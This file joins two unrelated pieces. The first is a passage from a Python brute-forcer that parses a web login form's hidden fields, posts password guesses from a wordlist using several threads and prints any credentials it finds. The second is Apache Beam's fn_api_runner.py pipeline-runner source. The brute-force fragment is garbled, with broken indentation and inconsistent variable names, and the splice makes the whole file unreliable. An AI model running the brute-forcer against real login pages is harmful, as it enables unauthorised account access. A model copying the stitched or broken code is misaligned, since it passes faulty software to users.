opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
response = opener.open(target_url)
            # read() must be called, and the bytes decoded before feeding the parser
            page = response.read().decode("utf-8", errors="ignore")
print(f"Trying: {self.username}: {brute} ({self.password_q.qsize()} left)")
# parse out the hidden fields
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
post_tags[username_field] = self.username
            post_tags[password_field] = brute
            login_data = urllib.parse.urlencode(post_tags).encode("utf-8")
            login_response = opener.open(target_post, login_data)
            login_result = login_response.read().decode("utf-8", errors="ignore")
if success_check in login_result:
self.found = True
print("[*] Bruteforce successful.")
print(f"[*] Username: {username}")
print(f"[*] Password:{brute}")
print("[*] Waiting for other threads to exit...")
def build_wordlist(word_list_file):
with open (word_list_file, "r") as l:
raw_words = [line.rstrip("\n") for line in l]
found_resume = False
word_queue = queue.Queue()
for word in raw_words:
if resume:
if found_resume:
word_queue.put(word)
else:
if word == resume:
found_resume = True
print(f"Resuming wordlist from: {resume}")
else:
word_queue.put(word)
return word_queue
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()
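# Illustrative sketch (not part of the script): run_bruteforce() above starts
# the worker threads without keeping references, so there is nothing to join
# while "waiting for other threads to exit". Keeping the Thread objects allows
# a proper join:
def run_and_wait(bruter, thread_count=user_thread):
    threads = [threading.Thread(target=bruter.web_bruter)
               for _ in range(thread_count)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()            # block until every worker has drained the queue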
|
fn_api_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import itertools
import logging
import os
import queue
import subprocess
import sys
import threading
import time
import uuid
from builtins import object
from concurrent import futures
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam import metrics
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricKey
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.metrics.metricbase import MetricName
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability.fn_api_runner_transforms import create_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import only_element
from apache_beam.runners.portability.fn_api_runner_transforms import split_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import unique_name
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
_DONE_MARKER = object()
def __init__(self):
self._push_queue = queue.Queue()
self._futures_by_id = dict()
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
self._lock = threading.Lock()
def Control(self, iterator, context):
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
self._inputs = iterator
# Note: We only support one client for now.
self._read_thread.start()
while True:
to_push = self._push_queue.get()
if to_push is self._DONE_MARKER:
return
yield to_push
def _read(self):
for data in self._inputs:
self._futures_by_id.pop(data.instruction_id).set(data)
def push(self, item):
if item is self._DONE_MARKER:
future = None
else:
if not item.instruction_id:
self._uid_counter += 1
item.instruction_id = 'control_%s' % self._uid_counter
future = ControlFuture(item.instruction_id)
self._futures_by_id[item.instruction_id] = future
self._push_queue.put(item)
return future
def done(self):
with self._lock:
if self._state == self.STARTED_STATE:
self.push(self._DONE_MARKER)
self._read_thread.join()
self._state = self.DONE_STATE
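# Illustrative sketch (not Beam code): Control() above streams items off a
# queue and terminates when it sees a private sentinel object. The same
# pattern in isolation:
_SENTINEL = object()

def _drain_until_sentinel(q):
    """Yield items from ``q`` until the sentinel is observed."""
    while True:
        item = q.get()
        if item is _SENTINEL:
            return
        yield item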
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
self._grouped_output = None
def append(self, elements_data):
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing
else windowed_key_value.with_value(value))
def __iter__(self):
if not self._grouped_output:
output_stream = create_OutputStream()
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(None).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for encoded_key, windowed_values in self._table.items():
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream, True)
self._grouped_output = [output_stream.get()]
self._table = None
return iter(self._grouped_output)
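# Illustrative sketch (not Beam code): stripped of coders and windowing,
# _GroupingBuffer above groups decoded key/value pairs into a
# ``defaultdict(list)`` keyed by the encoded key:
def _grouping_demo():
    table = collections.defaultdict(list)
    for k, v in [('a', 1), ('b', 2), ('a', 3)]:
        table[k].append(v)
    assert dict(table) == {'a': [1, 3], 'b': [2]}
    return table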
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(self, access_pattern, coder):
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn:
            self._kv_extractor = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('')
self._value_coder = coder.wrapped_value_coder
elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn:
            self._kv_extractor = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (
coder.wrapped_value_coder.value_coder())
else:
raise ValueError(
"Unknown access pattern: '%s'" % access_pattern.urn)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(list)
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_value = self._windowed_value_coder.get_impl(
).decode_from_stream(input_stream, True)
            key, value = self._kv_extractor(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
class FnApiRunner(runner.PipelineRunner):
def __init__(
self,
default_environment=None,
bundle_repeat=0,
use_state_iterables=False,
provision_info=None):
"""Creates a new Fn API Runner.
Args:
default_environment: the default environment to use for UserFns.
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
use_state_iterables: Intentionally split gbk iterables over state API
(for testing)
provision_info: provisioning info to make available to workers, or None
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._default_environment = (
default_environment
or beam_runner_api_pb2.Environment(urn=python_urns.EMBEDDED_PYTHON))
self._bundle_repeat = bundle_repeat
self._progress_frequency = None
self._profiler_factory = None
self._use_state_iterables = use_state_iterables
self._provision_info = provision_info
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self, pipeline, options):
MetricsEnvironment.set_metrics_supported(False)
RuntimeValueProvider.set_runtime_options({})
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._profiler_factory = profiler.Profile.factory_from_options(
options.view_as(pipeline_options.ProfilingOptions))
self._latest_run_result = self.run_via_runner_api(pipeline.to_runner_api(
default_environment=self._default_environment))
return self._latest_run_result
def run_via_runner_api(self, pipeline_proto):
return self.run_stages(*self.create_stages(pipeline_proto))
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output(
['git', 'rev-parse', '--abbrev-ref', 'HEAD']
).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
logging.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-variable
if not subprocess.call([
sys.executable, '-m', 'gprof2dot',
'-f', 'pstats', path, '-o', path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print('CPU Profile rendering at file://%s.svg'
% os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(self, pipeline_proto):
return fn_api_runner_transforms.create_and_optimize_stages(
copy.deepcopy(pipeline_proto),
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.expand_gbk,
fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.impulse_to_input,
fn_api_runner_transforms.inject_timer_pcollections,
fn_api_runner_transforms.sort_stages,
fn_api_runner_transforms.window_pcollection_coders],
known_runner_urns=frozenset([
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn]),
use_state_iterables=self._use_state_iterables)
def run_stages(self, stage_context, stages):
worker_handler_manager = WorkerHandlerManager(
stage_context.components.environments, self._provision_info)
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(list)
for stage in stages:
stage_results = self.run_stage(
worker_handler_manager.get_worker_handler,
stage_context.components,
stage,
pcoll_buffers,
stage_context.safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
worker_handler_manager.close_all()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def run_stage(
self,
worker_handler_factory,
pipeline_components,
stage,
pcoll_buffers,
safe_coders):
def iterable_state_write(values, element_coder_impl):
token = unique_name(None, 'iter').encode('ascii')
out = create_OutputStream()
for element in values:
element_coder_impl.encode_to_stream(element, out, True)
controller.state.blocking_append(
beam_fn_api_pb2.StateKey(
runner=beam_fn_api_pb2.StateKey.Runner(key=token)),
out.get())
return token
controller = worker_handler_factory(stage.environment)
context = pipeline_context.PipelineContext(
pipeline_components, iterable_state_write=iterable_state_write)
data_api_service_descriptor = controller.data_api_service_descriptor()
def extract_endpoints(stage):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[target] = [ENCODED_IMPULSE_VALUE]
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
logging.info('Running %s', stage.name)
logging.debug(' %s', stage)
data_input, data_side_input, data_output = extract_endpoints(stage)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
if controller.state_api_service_descriptor():
process_bundle_descriptor.state_api_service_descriptor.url = (
controller.state_api_service_descriptor().url)
# Store the required side inputs into state.
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
ptransform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
controller.state.blocking_append(state_key, elements_data)
def get_buffer(buffer_id):
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
if buffer_id not in pcoll_buffers:
# Just store the data chunks for replay.
pcoll_buffers[buffer_id] = list()
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
def get_input_coder_impl(transform_id):
return context.coders[safe_coders[
beam_fn_api_pb2.RemoteGrpcPort.FromString(
process_bundle_descriptor.transforms[transform_id].spec.payload
).coder_id
]].get_impl()
for k in range(self._bundle_repeat):
try:
controller.state.checkpoint()
BundleManager(
controller, lambda pcoll_id: [], get_input_coder_impl,
process_bundle_descriptor, self._progress_frequency, k
).process_bundle(data_input, data_output)
finally:
controller.state.restore()
result, splits = BundleManager(
controller, get_buffer, get_input_coder_impl, process_bundle_descriptor,
self._progress_frequency).process_bundle(
data_input, data_output)
def input_for(ptransform_id, input_id):
input_pcoll = process_bundle_descriptor.transforms[
ptransform_id].inputs[input_id]
for read_id, proto in process_bundle_descriptor.transforms.items():
if (proto.spec.urn == bundle_processor.DATA_INPUT_URN
and input_pcoll in proto.outputs.values()):
return read_id, 'out'
raise RuntimeError(
'No IO transform feeds %s' % ptransform_id)
last_result = result
last_sent = data_input
while True:
deferred_inputs = collections.defaultdict(list)
for transform_id, timer_writes in stage.timer_pcollections:
# Queue any set timers as new inputs.
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
deferred_inputs[transform_id, 'out'] = [out.get()]
written_timers[:] = []
# Queue any process-initiated delayed bundle applications.
for delayed_application in last_result.process_bundle.residual_roots:
deferred_inputs[
input_for(
delayed_application.application.ptransform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
# Queue any runner-initiated delayed bundle applications.
prev_stops = {}
for split in splits:
for delayed_application in split.residual_roots:
deferred_inputs[
input_for(
delayed_application.application.ptransform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
for channel_split in split.channel_splits:
coder_impl = get_input_coder_impl(channel_split.ptransform_id)
# TODO(SDF): This requires deterministic ordering of buffer iteration.
# TODO(SDF): The return split is in terms of indices. Ideally,
# a runner could map these back to actual positions to effectively
# describe the two "halves" of the now-split range. Even if we have
# to buffer each element we send (or at the very least a bit of
# metadata, like position, about each of them) this should be doable
# if they're already in memory and we are bounding the buffer size
# (e.g. to 10mb plus whatever is eagerly read from the SDK). In the
# case of non-split-points, we can either immediately replay the
# "non-split-position" elements or record them as we do the other
# delayed applications.
# Decode and recode to split the encoded buffer by element index.
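# (Worked example of the index arithmetic below: with 10 buffered
# elements, first_residual_element=4 and no earlier stop recorded for
# this transform, elements [4..9] are re-queued as residuals while
# [0..3] remain with the primary bundle.)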
all_elements = list(coder_impl.decode_all(b''.join(last_sent[
channel_split.ptransform_id, channel_split.input_id])))
residual_elements = all_elements[
channel_split.first_residual_element : prev_stops.get(
channel_split.ptransform_id, len(all_elements)) + 1]
if residual_elements:
deferred_inputs[
channel_split.ptransform_id, channel_split.input_id].append(
coder_impl.encode_all(residual_elements))
prev_stops[
channel_split.ptransform_id] = channel_split.last_primary_element
if deferred_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in deferred_inputs:
deferred_inputs[other_input] = []
# TODO(robertwb): merge results
last_result, splits = BundleManager(
controller,
get_buffer,
get_input_coder_impl,
process_bundle_descriptor,
self._progress_frequency,
True).process_bundle(deferred_inputs, data_output)
last_sent = deferred_inputs
result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
last_result.process_bundle.monitoring_infos))),
error=result.error or last_result.error)
else:
break
return result
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
class CopyOnWriteState(object):
def __init__(self, underlying):
self._underlying = underlying
self._overlay = {}
def __getitem__(self, key):
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
self._overlay[key] = []
def commit(self):
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self, underlying, overlay, key):
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
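# A minimal usage sketch of the copy-on-write overlay above (names as
# defined here; the dicts map state keys to lists of encoded chunks):
#
#   underlying = {'k': [b'a']}
#   cow = FnApiRunner.StateServicer.CopyOnWriteState(underlying)
#   cow['k'].append(b'b')  # first write copies [b'a'] into the overlay
#   list(cow['k'])         # -> [b'a', b'b']
#   underlying['k']        # -> [b'a'] until commit() folds the overlay in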
def __init__(self):
self._lock = threading.Lock()
self._state = collections.defaultdict(list)
self._checkpoint = None
self._use_continuation_tokens = False
self._continuations = {}
def checkpoint(self):
assert self._checkpoint is None
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
def commit(self):
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def blocking_get(self, state_key, continuation_token=None):
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = 'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', '%s:0' % token_base
else:
token_base, index = continuation_token.split(':')
ix = int(index)
full_state = self._continuations[token_base]
if ix == len(full_state):
return b'', None
else:
return full_state[ix], '%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def blocking_append(self, state_key, data):
with self._lock:
self._state[self._to_key(state_key)].append(data)
def blocking_clear(self, state_key):
with self._lock:
del self._state[self._to_key(state_key)]
@staticmethod
def _to_key(state_key):
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
self._state = state
def State(self, request_stream, context=None):
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_reference.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.blocking_get(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.blocking_append(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.blocking_clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
"""Does nothing."""
pass
class WorkerHandler(object):
_registered_environments = {}
def __init__(
self, control_handler, data_plane_handler, state, provision_info):
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
def close(self):
self.stop_worker()
def start_worker(self):
raise NotImplementedError
def stop_worker(self):
raise NotImplementedError
def data_api_service_descriptor(self):
raise NotImplementedError
def state_api_service_descriptor(self):
raise NotImplementedError
def logging_api_service_descriptor(self):
raise NotImplementedError
@classmethod
def register_environment(cls, urn, payload_type):
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
@classmethod
def create(cls, environment, state, provision_info):
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info)
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory controller for fn API control, state and data planes."""
def __init__(self, unused_payload, state, provision_info):
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.worker = sdk_worker.SdkWorker(
sdk_worker.BundleProcessorCache(
FnApiRunner.SingletonStateHandlerFactory(self.state),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
{}))
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
logging.debug('CONTROL REQUEST %s', request)
response = self.worker.do_instruction(request)
logging.debug('CONTROL RESPONSE %s', response)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
pass
def stop_worker(self):
pass
def done(self):
pass
def data_api_service_descriptor(self):
return None
def state_api_service_descriptor(self):
return None
def logging_api_service_descriptor(self):
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(
beam_provision_api_pb2_grpc.ProvisionServiceServicer):
def __init__(self, info):
self._info = info
def GetProvisionInfo(self, request, context=None):
return beam_provision_api_pb2.GetProvisionInfoResponse(
info=self._info)
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based controller for fn API control, state and data planes."""
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self, state, provision_info):
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10))
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
provision_info = self.provision_info.provision_info
if not provision_info.worker_id:
provision_info = copy.copy(provision_info)
provision_info.worker_id = str(uuid.uuid4())
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(self.provision_info.provision_info),
self.control_server)
if self.provision_info.artifact_staging_dir:
m = beam_artifact_api_pb2_grpc
m.add_ArtifactRetrievalServiceServicer_to_server(
artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir),
self.control_server)
self.data_plane_handler = data_plane.GrpcServerDataChannel()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
FnApiRunner.GrpcStateServicer(state),
self.state_server)
self.logging_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=2),
options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(),
self.logging_server)
logging.info('starting control server on port %s', self.control_port)
logging.info('starting data server on port %s', self.data_port)
logging.info('starting state server on port %s', self.state_port)
logging.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
